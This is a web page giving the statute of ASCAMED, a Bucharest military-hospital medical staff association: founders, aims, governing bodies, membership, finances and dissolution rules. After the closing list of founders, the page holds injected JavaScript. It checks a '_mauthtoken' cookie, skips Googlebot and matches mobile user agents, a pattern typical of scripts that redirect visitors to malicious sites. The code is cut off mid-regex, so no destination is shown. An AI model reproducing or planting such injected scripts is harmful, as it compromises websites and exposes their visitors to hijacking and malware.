ASCAMED – Asociaţia Cadrelor Medicale din Spitalul Universitar de Urgenţă Militar Central ” Dr. Carol Davila” Bucureşti

STATUTUL ASCAMED

Asociaţia Cadrelor Medicale din Spitalul Universitar de Urgenţă Militar Central ” Dr. Carol Davila” Bucureşti


Cerere adeziune ASCAMED

 

XXXXX

XXXXX

Subsemnaţii:

1. RĂDULESCU GHEORGHE – CRISTIAN
2. NICULESCU NICOLAE
3. COTEA AURORA
4. IONIŢĂ-RADU FLORENTINA
5. TEODORU GIGI
6. CORNECI DAN
7. DINU MARIUS
8. SÎRBU CARMEN- ADELLA
9. RUSU CRISTINEL
10. SÎRBU OCTAVIAN-MIHAI
11. GROSU GIORGETA
12. RANETTI AURELIAN EMIL
13. DAVID LUCIAN
14. MITREA MARIA
15. GĂTEJ CONSTANTIN
16. MARINESCU BOGDAN – MIHAI
17. MITRICĂ MARIAN
18. POPA EMIL
19. CODOREAN ION BOGDAN
20. DINU ANA

am hotărât în conformitate cu Ordonanţa Guvernului nr. 26/2000 cu privire la asociaţii şi fundaţii, cu modificările şi completările ulterioare, adoptarea prezentului Statut al asociaţiei.

Capitolul I

DISPOZIŢII GENERALE
DENUMIRE, SEDIU, DURATĂ, FORMĂ JURIDICĂ, PATRIMONIU, SCOP, OBIECTIVE

Art. 1. Denumirea asociaţiei este ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI, înregistrată la Ministerul Justiţiei sub nr. 134446/31.03.2014.

Art.2. – (1) Sediul asociaţiei este în Bucureşti, Str. Managua nr. 1, sector 1.

(2) Sediul asociaţiei poate fi schimbat pe baza hotărârii Consiliului Director.

Art.3. Asociaţia se constituie conform O.G. 26/2000 cu privire la asociaţii şi fundaţii, modificată şi completată prin Legea nr. 246/2005, Legea nr. 305/2008, Legea nr. 34/2010, Legea nr. 76/2012 şi Legea 145/2012, fiind persoană juridică de drept privat fără scop patrimonial.

Art.4. ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL DR. CAROL DAVILA BUCUREŞTI se constituie pe o durată nedeterminată.

Art. 5. – (1) Patrimoniul social al asociaţiei este alcătuit dintr-un activ patrimonial, iniţial, în valoare de 2.000 lei şi este alcătuit din următoarele aporturi în numerar depuse de fondatori astfel:

RĂDULESCU GHEORGHE – CRISTIAN – 100 lei;
NICULESCU NICOLAE –    100 lei;
COTEA AURORA –   100 lei;
IONIŢĂ-RADU FLORENTINA                     – 100 lei;
– TEODORU GIGI                                              – 100 lei;
– CORNECI DAN                                               – 100 lei;
– DINU MARIUS                                                – 100 lei;
– SÎRBU CARMEN- ADELLA                          – 100 lei;
– GROSU GIORGETA                                        – 100 lei;
– SÎRBU OCTAVIAN-MIHAI                            – 100 lei;
– RUSU CRISTINEL                               – 100 lei;
– RANETTI AURELIAN EMIL                         – 100 lei;
– DAVID LUCIAN                                               – 100 lei;
– MITREA MARIA                                             – 100 lei;
– GĂTEJ CONSTANTIN                                    – 100 lei;
– MARINESCU BOGDAN – MIHAI                – 100 lei;
MITRICĂ MARIAN                                        – 100 lei;
– POPA EMIL                                                      – 100 lei;
– CODOREAN ION BOGDAN                          – 100 lei;
– DINU ANA                                                        – 100 lei.

(2) Întregul patrimoniu va fi evidenţiat şi păstrat în conformitate cu legislaţia română în materie, pe numele asociaţiei şi va fi folosit exclusiv pentru realizarea obiectivelor ei.

Art. 6. (1) SCOPUL ASOCIAŢIEI

Asociaţia se constituie şi îşi desfăşoară activitatea în vederea realizării următoarelor scopuri fundamentale:

 1. de a sprijini membrii asociaţiei în desfăşurarea activitaţii lor profesionale ;
 2. de a intrajutora pensionarii sistemului medical aflati in situatii deosebite;
 3. de a furniza opinii de specialitate pentru orice organism/organizaţie care solicită consultanţă pertinentă în domeniul medical;
 4. de a stabili şi revizui recomandari stiintifice medicale, inclusiv dezvoltarea de ghiduri medicale şi editarea de publicaţii medicale, colaborând cu organisme specializate din ţară şi străinătate;
 5. de a dezvolta şi furniza informaţie şi training în domeniul medical;
 6. de a apăra/susţine dezvoltarea carierelor în domeniul  medical;
 7. de a sprijini activitatea  sub toate aspectele cercetării stiintifice;
 8. de a sprijini comunicarea între diferitele ramuri medicale şi de a susține conlucrarea acestora pentru a asigura dezvoltarea unei voci unitare a specialiştilor;
 9. de a furniza o opinie medicala unitară şi de a o reprezenta în faţa publicului în general şi a pacienţilor în special;
 10. de a promova şi de a susţine respectarea principiilor eticii medicale.

Art 7. OBIECTIVELE asociaţiei în vederea realizării scopului ei, sunt următoarele:

 1. Promovarea prin mijloace legale  a Asociaţiei şi intereselor acesteia, inclusiv prin susţinerea iniţiativelor legislative;
 2. Organizarea  de evenimente necesare indeplinirii scopurilor si obiectivelor Asociatiei ;
 3. Participarea la elaborarea unor strategii specifice, în colaborare cu organismele guvernamentale şi neguvernamentale, în probleme medicale;
 4. Organizarea de cursuri, congrese, conferinţe, consfătuiri, simpozioane naţionale si internaţionale şi participarea, prin delegaţii săi, la aceste manifestări ştiinţifice, sub egida Asociaţiei;
 5. Stimularea, sprijinirea şi organizarea de schimburi profesionale ale membrilor săi cu parteneri din ţară şi străinătate în domeniul de activitate al Asociaţiei, contribuind la imbunătăţirea practicii medicale;
 6. Perfecţionarea practicii medicale, cercetării medicale şi învăţământului medical în vederea optimizării sistemului de asistenţă medicală şi a îmbunătăţirii stării de sănătate a populaţiei;
 7. Promovarea şi  participarea  la studii  clinice  şi proiecte de cercetare ştiinţifică în domeniul medical;
 8. Editarea de articole, lucrări, monografii,cărţi, alte publicaţii ştiinţifice;
 9. Stabilirea de colaborări cu organizaţii similare din ţară şi străinătate;

10.  Acordarea de ajutor tuturor pensionarilor sistemului medical aflaţi in situaţii dificile, după modelul campaniei ,,Artişti pentru artişti’’ organizată de UNITER;

11.  Ridicarea prestigiului, reprezentarea, susţinerea şi promovarea intereselor profesionale ştiinţifice precum şi protejarea activităţilor specifice atât pe plan intern cât şi internaţional în domeniul de activitate al Asociaţiei;

12.  Acordarea de diplome, premii şi alte modalităţi stimulative pentru activitate ştiinţifică şi profesională deosebită;

13.  Participarea la activităţi vizând creşterea calităţii deontologice a actului medical;

14.  Propunerea de proiecte de optimizare a învăţământului universitar şi postuniversitar medical;

15.  Obţinerea şi acordarea de burse în ţară şi străinătate;

16.  Desfăşurarea oricărei alte activităţi iniţiate de Membri  în cadrul unei adunări convocate în mod valabil,  în conformitate cu prevederile prezentului Statut şi în acord cu scopul pentru care a fost constituită Asociaţia.

Art. 8. Schimbarea Scopului şi Obiectivelor Asociaţiei se face numai de către Adunarea Generală, cu întrunirea votului a ½  plus 1 din numărul membrilor Asociaţiei.

Art. 9. ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI se poate afilia cu alte persoane juridice nonprofit, din ţară şi/sau din străinătate, în scopul realizării scopului şi obiectivelor sale.

Art. 10. (1) Asociaţia îşi poate constitui filiale ca structuri teritoriale, pe  baza hotărârii Adunării generale prin care li se alocă un patrimoniu.

(2) Filiala este condusă de un Consiliu director propriu, alcătuit din cel puţin   3 membri;

(3) Filiala este entitate cu personalitate juridică, putând încheia, în nume propriu, acte juridice de administrare şi de conservare în condiţiile stabilite de Consiliul director prin actul constitutiv al ei şi se pot încheia acte juridice de dispoziţie, în numele şi pe seama Asociaţiei numai pe baza hotărârii prealabile a Consiliului director al asociaţiei;

(4) Asociaţia îşi poate constitui sucursale şi/sau puncte de lucru, (entităţi fără personalitate juridică), fără patrimoniu, ca structuri teritoriale, prin hotărârea Consiliului director.

Capitolul II

ORGANELE DE CONDUCERE ŞI CONTROL

Secţiunea I

ADUNAREA GENERALĂ

Art. 11. Organele de conducere şi control ale ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI sunt:

–         adunarea generală;
–         consiliul director;
–         cenzorul.

Art. 12 – ADUNAREA GENERALĂ este organul de conducere, alcătuit din totalitatea asociaţilor.

12.1. Atribuţiile Adunării Generale sunt:

a)      stabilirea strategiei şi a obiectivelor generale ale Asociaţiei;
b)      aprobarea bugetului de venituri şi cheltuieli şi a bilanţului contabil;
c)      alegerea şi revocarea membrilor Consiliului Director;
d)      alegerea şi revocarea cenzorului sau, după caz, a membrilor Comisiei de Cenzori;
e)      modificarea actului constitutiv şi a statutului;
f)        dizolvarea şi lichidarea asociaţiei, precum şi stabilirea destinaţiei bunurilor rămase după lichidare;
g)      stabileşte taxă de înscriere şi cotizaţia anuală;
h)      aprobă primirea de noi membrii şi aprobă excluderea membrilor din asociaţie;
i)        orice alte atribuţii prevăzute în lege sau statut.

12.2. Adunarea generală se întruneşte cel puţin o dată pe an şi are drept de control permanent asupra Consiliului Director şi cenzorului/Comisiei de Cenzori şi/sau în şedinţe extraordinare ori de câte ori este nevoie.

12.3. Adunarea generală este legal constituită în prezenţa a jumătate plus unu din membrii asociaţiei la prima convocare. Dacă la prima convocare nu s-a întrunit cvorumul, cea de a doua convocare se va realiza după maxim o săptămână şi se consideră statutară, indiferent de numărul de membri participanţi.

12.4. Adunarea generală ordinara se convoacă de către Consiliul director sau de cel puţin 1/3 din numărul asociaţilor, cu cel puţin o săptămână înaintea întrunirii, prin înştiinţări scrise sau telefonice.

12.5. Adunarea Generală Extraordinară se convoacă de către Consiliul director sau de cel puţin 1/3 din numărul asociaţilor, cu cel puţin o săptămână înaintea întrunirii, prin înştiinţări scrise sau telefonice.

12.6. Hotărârile Adunării Generale se iau cu majoritate simplă de voturi, fiecare membru având dreptul la un singur vot, cu excepţia membrilor de onoare ai Asociaţiei şi care nu vor putea vota.

12.7. Preşedintele Adunării Generale, desemnat din rândul membrilor asociaţi, va decide accesul altor persoane decât acelea menţionate în paragraful de mai sus.

12.8. Fiecare Membru al Asociaţiei, în cadrul procedurii de vot, va avea dreptul la un vot. Buletinele de vot albe sau invalide vor fi înlăturate şi nu vor fi luate în considerare.

Art. 13 – ASPECTE PRIVIND CVORUMUL ŞI PROCEDURA DE VOTARE

13.1. Adunările Generale sunt prezidate de Preşedinte. În cazul absenţei acestuia, Adunarea Generală va fi prezidată de către Vicepreşedinte, iar în lipsa acestora de Secretarul General.

13.2. Hotărârile Adunării Generale se adoptă cu majoritatea simplă a voturilor exprimate în cadrul unei reuniuni, în care cel puţin jumătate plus unu din numărul de membri care au drept de vot sunt prezenţi, conform art. 12.3.

13.3. În situația în care, în cadrul unei reuniuni nu se întrunesc cel puţin jumătate plus unu din numărul de membri care au drept de vot, la o săptămână se convoacă o nouă adunare generală, iar hotărârile pot fi luate cu majoritatea simplă a membrilor prezenți.

13.4. Toate sesiunile de vot se vor exprima prin “vot deschis”, cu excepţia cazului în care la propunerea Preşedintelui, Adunarea Generală va hotărî ca votul să fie exprimat în scris.

13.5. Secretarul General întocmeşte procesul verbal al reuniunii care este adoptat şi semnat şi de către Preşedinte şi ceilalţi membrii prezenţi ai Consiliului Director.

Secţiunea a II-a

CONSILIUL DIRECTOR

Art. 14.  – CONSILIUL DIRECTOR

14.1. Consiliul director este organul executiv al ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI şi asigură punerea în executare a hotărârilor Adunării Generale.

14.2. STRUCTURA CONSILIULUI DIRECTOR este URMÃTOAREA:

(a) un Preşedinte;
(b) un Vice-preşedinte;
(c) un Secretar general;
(d) patru Membri.

Prin vot deschis s-a stabilit componenţa primului Consiliului Director, după cum urmează:

 1. Preşedinte: RĂDULESCU GHEORGHE – CRISTIAN;
 2. Vice-preşedinte: NICULESCU NICOLAE;
 3. Secretar General: COTEA AURORA;
 4. Membru : IONIŢĂ-RADU FLORENTINA;
 5. Membru: TEODORU GIGI;
 6. Membru: CORNECI DAN;
 7. Membru: DINU MARIUS.

14.3. Membrii primului Consiliului Director sunt aleşi iniţial pe o perioadă de doi (2) ani, urmând ca ulterior să fie aleşi pentru un mandat unic de doi (2) ani, fără posibilitatea alegerii succesive a doua mandate.

14.4. Preşedintele este ales pentru un mandat de doi (2) ani şi reprezintă în mod valabil Asociaţia în faţa terţilor.

Art. 15 – ATRIBUŢIILE CONSILIULUI DIRECTOR

15.1. Consiliul director asigură punerea în executare a hotărârilor Adunării generale. În exercitarea competenţei sale, Consiliul director, are următoarele atribuţii:

a) prezintă Adunării Generale raportul de activitate pe perioadă anterioară, executarea bugetului de venituri şi cheltuieli, bilanţul contabil, proiectul bugetului de venituri şi cheltuieli, proiectul programelor asociaţiei;

b) încheie acte juridice în numele şi pe seama asociaţiei;

c) aprobă schimbarea sediului societăţii;

d) aprobă organigrama şi politica de personal ale asociaţiei;

e) îndeplineşte orice alte atribuţii stabilite de prezentul statut sau de Adunarea generală;

f) poate împuternici orice persoană, inclusiv persoane care nu au calitatea de membru al asociaţiei, pentru a încheia acte juridice în numele şi pe seama asociaţiei sau pentru a îndeplini orice alte atribuţii prevăzute în statut sau stabilite de Adunarea Generală;

g) Consiliul Director îşi poate elabora un regulament intern de funcţionare.

15.2. ( 1) Consiliul Director se întuneşte cel puţin o dată pe lună sau ori de câte ori nevoile Asociaţiei o impun.

(2) Convocarea Consiliului Director se face de preşedinte, iar în lipsa acestuia de înlocuitorul său, cu cel puţin 10 zile înainte de data fixată.

(3) Consiliul Director deliberează, în mod valabil, în prezenţa a 2/3 din numărul membrilor săi şi adoptă hotărâri cu o jumatate plus unu din voturi.

15.3. Deliberările şi hotărârile Consiliului Director se consemnează în procesele verbale încheiate cu ocaza fiecărei şedinţe.

Art. 16 – PREŞEDINTELE

16.1 Preşedintele ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI are următoarele atribuţii:

a) reprezintă Asociaţia în relaţiile cu terţii;

b) încheie acte juridice în numele şi pe seama Asociaţiei;

c) coordonează activitatea compartimentelor Asociaţiei;

d) conduce Consiliul Director şi prezidează Adunarea Generală;

e) îndeplineşte orice alte atribuţii stabilite de Adunarea Generală;

16.2 În lipsa Preşedintelui asociaţiei, vicepreşedintele exercită atribuţiile acestuia.

Secţiunea a III-a

CONTROLUL FINANCIAR

Art. 17.(1) Controlul financiar al asociaţiei este asigurat de un cenzor.

(2) În realizarea competenţei sale, cenzorul:

a) verifică modul în care este administrat patrimoniul Asociaţiei;
b) întocmeşte rapoarte şi le prezintă Adunării generale şi Consiliului director;
c)      poate participa la şedinţele Consiliului director, fără drept de vot;
d)      îndeplineşte orice alte atribuţii prevăzute în statut sau stabilite de Consiliul director.

(3) Membrii Consiliului Director nu pot fi cenzori.

(4) Controlul financiar intern va fi asigurat de o comisie de cenzori, dacă asociaţia va avea mai mult de 100 de membri înscrişi, în condiţiile dispoziţiilor legale în vigoare.

Art. 18. – (1) Adunarea generală aprobă regulile generale de organizare a controlului financiar intern al Asociaţiei.

(2) Cenzorul este ales de către Adunarea generală, prin vot deschis, cu întrunirea a 2/3 din votul membrilor prezenţi, pentru un mandat de 2 ani.

(3) Primul cenzor pe o perioadă de 2 ani de la data prezentului înscris este dna MITRUŢOIU MARIANA.

Capitolul III

MEMBRII ASOCIAŢIEI ŞI OBLIGAŢIILE LOR

Art. 19. MEMBRII

Asociaţia este compusă din:

a) Membrii fondatori – persoane fizice sau juridice – membrii care au constituit asociaţia şi au contribuit moral şi material la fondarea ei şi la constituirea patrimoniului social;
b) Membrii asociaţi – persoane fizice sau juridice – care aderă ulterior la prevederile prezentului statut şi care contribuie moral şi material la completarea patrimoniului asociaţiei şi care, prin activitatea lor, sprijină asociaţia în realizarea obiectivelor acesteia, beneficiind de drepturile prevăzute de prezentul statut ;
c) Membrii de onoare (fără drept de vot) – persoane fizice sau/şi persoane  juridice, care prin activitatea lor, sprijină în mod substanţial asociaţia în realizarea obiectivelor acesteia, contribuind din punct de vedere financiar, moral sau funcţional la realizarea scopului Asociaţiei Cadrelor Medicale din Spitalul Universitar de Urgenţă Militar Central ,,Dr. Carol Davila”, sau personalităţi marcante ale vieţii ştiinţifice, sportive sau culturale, care s-au remarcat, cu deosebire, în domeniile de interes ale asociaţiei şi care, prin activitatea lor, sprijină asociaţia în realizarea scopului/obiectivelor acesteia.

19.1. DISPOZIŢII GENERALE cu privire la MEMBRI

19.1.1. Pot deveni membri ai ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI medicii rezidenţi, specialişti sau primari, psihologi, precum şi  cercetătorii în diferite discipline, precum şi personalul medical sanitar superior (biologi, chimişti, biochimişti, fizicieni etc.), asistenţi medicali şi orice altă persoană fizică sau juridică ce manifestă interes în domeniul de activitate al Asociaţiei şi sprijină activitatea acesteia – inclusiv studenţi la medicină.

19.1.2. Persoanele fizice şi juridice care doresc să devină membri ai ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI trebuie să depună o adeziune scrisă în acest sens.

19.1.3. Calitatea de membru se dobândeşte prin aprobarea adeziunii de către Consiliul Director şi ratificarea ei de Adunarea Generală.

19.1.4. Calitatea de membru de onoare se atribuie, de către Consiliul Director, persoanelor care şi-au adus o contribuţie importantă la desfăşurarea activităţii Asociaţiei sau care au avut o activitate deosebită în domeniile de interes ale Asociaţiei şi care va fi ratificată de Adunarea Generală.

19.1.5. Titlul de Membru de Onoare al Asociaţiei poate fi propus de membrii Consiliului Director şi conferit medicilor, oamenilor de ştiinţă sau altor persoane fizice/juridice ca urmare a realizãrilor lor excepţionale în discipline conexe şi ratificat de Adunarea Generală.

Art. 20 – DREPTURILE ŞI OBLIGAŢIILE MEMBRILOR ASOCIAŢIEI.

Membrii ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI au următoarele drepturi şi obligaţii:

20.1. DREPTURI:

a) să participe la luarea hotărârilor care privesc activitatea asociaţiei în Adunarea Generală;
b) să aleagă organele de conducere şi să fie aleşi în aceasta ;
c) să fie informaţi în ceea ce priveşte activitatea asociaţiei ;
d) să recomande primirea de noi membri asociaţi;
e) să participe la manifestările organizate de asociaţie;
f) să aibă acces la lucrările, publicaţiile şi materialele documentare de care dispune asociaţia;
g) să beneficieze de toate condiţiile oferite de asociaţie pentru informare şi pregătire profesională.

20.2. OBLIGAŢII:

a) să respecte prevederile statutului asociaţiei şi să acţioneze în conformitate cu scopul acesteia;
b) să sprijine asociaţia în organizarea şi desfăşurarea acţiunilor sale;
c) să contribuie la creşterea prestigiului general al asociaţiei;
d) să participe la lucrările şi activităţiile asociaţiei atunci când sunt solicitaţi de către organele de conducere ale acesteia şi să păstreze secretul asupra activităţiilor şi deciziilor din cadrul asociaţiei;
e) să plătească la termen taxa de înscriere în asociaţie ca membru , precum şi cotizaţia anuală a membrilor asociaţi.

Art. 21 PIERDEREA CALITĂŢII DE MEMBRU AL ASOCIAŢIEI

21.1. Calitatea de membru se pierde într-una din următoarele situaţii :

a) decesul sau incapacitatea persoanelor fizice;
b) retragerea la cerere, înscris, prin comunicarea către Consiliul Director;
c) excluderea din Asociaţie se face prin decizia Adunării generale;
d) dizolvarea asociaţiei;

21.2. Retragerea din asociaţie ca membru se face pe bază de cerere scrisă, aprobată de Consiliul Director şi ratificată de Adunarea Generală.

21.3. Un membru este exclus când:

a) săvârşeşte abateri care contravin statului;
b) nu participă la acţiunile organizate în care a fost nominalizat;
c) nu plăteşte cotizaţia timp de un an;
d) nu efectuează numărul de ore de voluntariat stabilit de Adunarea generală;
e) aduce prejudicii grave imaginii asociaţiei;
f) nu respectă deciziile Preşedintelui şi ale Consiliului Director, precum şi hotărârile Adunării Generale a asociaţiei sau prevederile altor documente oficiale ale asociaţiei ;

21.4. Excluderea unui membru se face prin decizia Adunării Generale .

Art 22 – Taxa de înscriere şi cotizaţia

22.1. Pentru membrii asociaţiei, taxa de înscriere, criterile după care se calculează cotizaţia anuală precum şi cuantumul acesteia se stabilesc prin hotărârea Consiliului Director.

22.2. În funcţie de situaţiile ce se pot ivi pe parcursul desfăşurării activităţii, Consiliului Director poate propune şi Adunarea Generală poate aproba modificarea cuantumului taxei de înscriere şi a cotizaţiei..

22.3. În toate situaţiile de pierdere a calităţii de membru asociat, cât şi în cazul excluderii, sumele depuse sub formă de taxe de înscriere sau cotizaţii anuale, dar şi  orice altă contribuţie în bani acordată asociaţiei, nu se restituie.

22.4. Niciun membru al asociaţiei nu este personal responsabil de angajamentele contractate de asociaţie.

Asociaţia garantează cu patrimoniul său angajamentele contractate.

22.5. Taxa de înscriere pentru anul 2014 este de 200 lei, iar cotizaţia anuală este de 100 lei, care se plăteşte la trezorierie asociaţiei în perioada 1-15 octombrie 2014.

Capitolul IV

VENITURILE ŞI CHELTUIELILE ASOCIAŢIEI

Art. 23.Veniturile asociaţiei provin din:

1)      cotizaţiile şi contribuţiile în bani ale membrilor fondatori şi a celorlalte categorii de membri;
2)      taxe de înscriere;
3)      dobânzile şi dividendele rezultate din plasarea sumelor disponibile în condiţii legale;
4)      dividendele societăţilor comerciale înfiinţate de asociaţie;
5)      venituri realizate din activităţi economice directe;
6)      donaţii, sponsorizări sau legate;
7)      resurse obţinute de la bugetul de stat şi/sau de la bugete locale;
8)      campanii de strângere de fonduri, spectacole de caritate, teledonuri şi orice alte mijloace legale de strângere de fonduri;
9)      alte venituri prevăzute de lege sau alte acte normative.

Art. 24.(1) Asociaţia poate înfiinţa societăţi comerciale ale căror dividende, dacă nu se reinvestesc în aceste societăţi, se vor folosi pentru realizarea scopului ei.

(2) Asociaţia poate desfăşura orice alte activităţi economice directe, dacă acestea au caracter accesoriu şi au legătură strânsă cu scopul principal al ei.

Art. 25.(1) Principalele cheltuieli ale asociaţiei sunt:

1)       cheltuieli pentru realizarea programelor şi obiectivelor asociaţiei;
2)      salarii şi adaosuri la salarii;
3)      indemnizaţii, prime şi premii;
4)      procurări de rechizite şi imprimate de birou;
5)      chirii, dobânzi, taxe, comisioane bancare;
6)      cazare, masă, transport, burse;
7)      utilităţi  (energie electrică, termică şi gaze naturale, apă canal, salubritate etc.);
8)      cheltuieli publicitate;
9)       pregătire şi perfecţionare personal;
10)   alte cheltuieli legale.

(2) Cheltuielile se efectuează potrivit prevederilor bugetului de venituri şi cheltuieli şi se aprobă de persoanele însărcinate de Consiliul director.

(3) Salariile, indemnizaţiile şi alte drepturi băneşti ale personalului se stabilesc în limitele statutului de funcţiuni şi ale bugetului de venituri şi cheltuieli.

(4) Consiliul director poate dispune plata de premii, gratificaţii şi altele asemenea din disponibilităţile existente.

Art. 26. Exerciţiul economico-financiar începe la data de 1 ianuarie şi se încheie la data de 31 decembrie ale fiecărui an.

Capitolul V

MODIFICAREA STATUTULUI

Art. 27. –Schimbarea Actului Constitutiv şi a Statutului, având ca obiect scopul/obiectivele Asociaţiei, se va face numai de Adunarea Generală a Asociaţiei, cu votul a cel puţin 51% din membrii asociaţiei.

Capitolul VI

DIZOLVAREA ŞI LICHIDAREA

Art. 28 ASCAMED – ASOCIAŢIA CADRELOR MEDICALE DIN SPITALUL UNIVERSITAR DE URGENŢĂ MILITAR CENTRAL ” DR. CAROL DAVILA” BUCUREŞTI se va dizolva:

I. De drept prin:

a)      realizarea sau, după caz, imposibilitatea realizării scopului pentru care a fost constituită, dacă în termen de 3 luni de la constatarea unui astfel de fapt nu se produce schimbarea acestui scop;
b)      imposibilitatea constituirii Adunării generale sau a Consiliului director în conformitate cu statutul asociaţiei, dacă această situaţie durează mai mult de un an de la data la care, potrivit statutului, Adunarea generală sau, după caz, Consiliul director trebuia să se constituie;
c)      reducerea numărului de asociaţi sub limita fixată de lege, dacă acesta nu a fost complinit timp de 3 luni.

II. Prin hotărâre judecătorească, la cererea oricărei persoane interesate, atunci când:

a)      scopul sau activitatea asociaţiei a devenit ilicită sau contrară ordinii publice;
b)      realizarea scopului este urmărită prin mijloace ilicite sau contrare ordinii publice;
c)      urmăreşte alt scop decât cel pentru care s-a constituit;
d)      a devenit insolvabilă;
e)      nu mai obţine autorizaţiile prealabile necesare, potrivit legii.

III. Asociaţia se poate dizolva şi prin hotărârea Adunării generale.

Art. 29.(1) În cazul divolvării asociaţiei, lichidatorii se numesc de instanţa judecătorească, cu excepţia dizolvării asociaţiei de Adunarea generală caz în care aceasta va numi lichidatorii.

(2) Odată cu numirea lichidatorilor, mandatul Consiliului director încetează.

(3) Lichidatorii la intrarea în funcţie efectuează inventarul şi încheie un bilanţ care să constate situaţia exactă a activului şi pasivului.

(4) Ei sunt obligaţi să primească şi să păstreze registrele şi orice alte acte ale asociaţiei şi să ţină un registru cu toate operaţiunile lichidării, în ordinea datei acestora.

(5) Lichidatorii îşi îndeplinesc mandatul sub controlul cenzorului/Comisiei de cenzori.

Art. 30.(1) Lichidatorii au obligaţia de a continua operaţiunile juridice în curs, de a încasa creanţele, de a plăti creditorii, iar dacă numerarul nu este suficient, de a transforma şi restul activului în bani, procedând la vânzarea prin licitaţie publică a bunurilor mobile şi imobile.

(2) Lichidatorii pot realiza numai acele operaţiuni noi care sunt necesare finalizării celor aflate în curs de derulare.

Art. 31.(1) În cazul dizolvării asociaţiei, bunurile rămase în urma lichidării nu se pot transmite către persoane fizice.

(2) Aceste bunuri pot fi transmise către persoane juridice de drept privat sau de drept public cu scop caritabil.

(3) Dacă în termen de 6 luni de la terminarea lichidării, lichidatorii nu au reuşit să transmită bunurile în condiţiile alineatului (2), ele se atribuie de instanţa competentă unei persoane juridice cu scop identic sau asemănător.

(4) Data transmiterii bunurilor este cea a întocmirii procesului-verbal de predare-primire, dacă prin acesta nu s-a stabilit o dată ulterioară.

Art. 32.Lichidatorii încheie operaţiunile şi remit celor în drept contul gestiunii numai după expirarea unui termen de 6 luni de la publicarea dizolvării asociaţiei.

Art. 33.După încheierea lichidării, lichidatorii sunt obligaţi ca în termen de două luni să depună bilanţul, registrul jurnal şi un memorandum, să declare operaţiunile de lichidare la Registrul asociaţiilor şi fundaţiilor al Judecătoriei în a cărei circumscripţie teritorială îşi are sediul asociaţia şi să îndeplinească toate procedurile de publicare şi radiere din acest registru.

Art. 34. Dacă în termen de 30 de zile libere de la depunerea bilanţului nu se înregistrează nici o contestaţie, bilanţul se consideră definitiv aprobat, iar lichidatorii, cu autorizarea judecătoriei, vor remite celor în drept bunurile şi sumele rămase de la lichidare, împreună cu toate registrele şi actele fundaţiei şi ale lichidării, după aceasta fiind consideraţi descărcaţi.

Art 35. – (1) Asociaţia încetează a avea fiinţă la data radierii din Registrul asociaţiilor şi fundaţiilor.

(2) Radierea se face în baza actului constatator eliberat lichidatorilor, prin care se atestă descărcarea acestora de obligaţiile asumate.

Capitolul VII

DISPOZIŢII FINALE

Art. 36.Prevederile prezentului statut se completează cu dispoziţiile Codului Civil, Codului de Procedură Civilă, OG nr. 26/2000 privind asociaţiile şi fundaţiile, precum şi orice altă lege în materie.

Redactat şi editat de avocat POPESCU MARIN în 7 (şapte) exemplare la sediul Cabinetului de AVOCAT POPESCU MARIN, azi data atestării, conform art. 3 din Legea nr. 51/1995, republicată.

MEMBRI FONDATORI,

 1. RĂDULESCU GHEORGHE – CRISTIAN
 2. NICULESCU NICOLAE
 3. COTEA AURORA
 4. IONIŢĂ-RADU FLORENTINA
 5. TEODORU GIGI
 6. CORNECI DAN
 7. DINU MARIUS
 8. SÎRBU CARMEN- ADELLA
 9. GROSU GIORGETA
 10. SÎRBU OCTAVIAN-MIHAI
 11. RUSU CRISTINEL
 12. RANETTI AURELIAN EMIL
 13. DAVID LUCIAN
 14. MITREA MARIA
 15. GĂTEJ CONSTANTIN
 16. MARINESCU BOGDAN – MIHAI
 17. MITRICĂ MARIAN
 18. POPA EMIL
 19. CODOREAN ION BOGDAN
 20. DINU ANA

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| 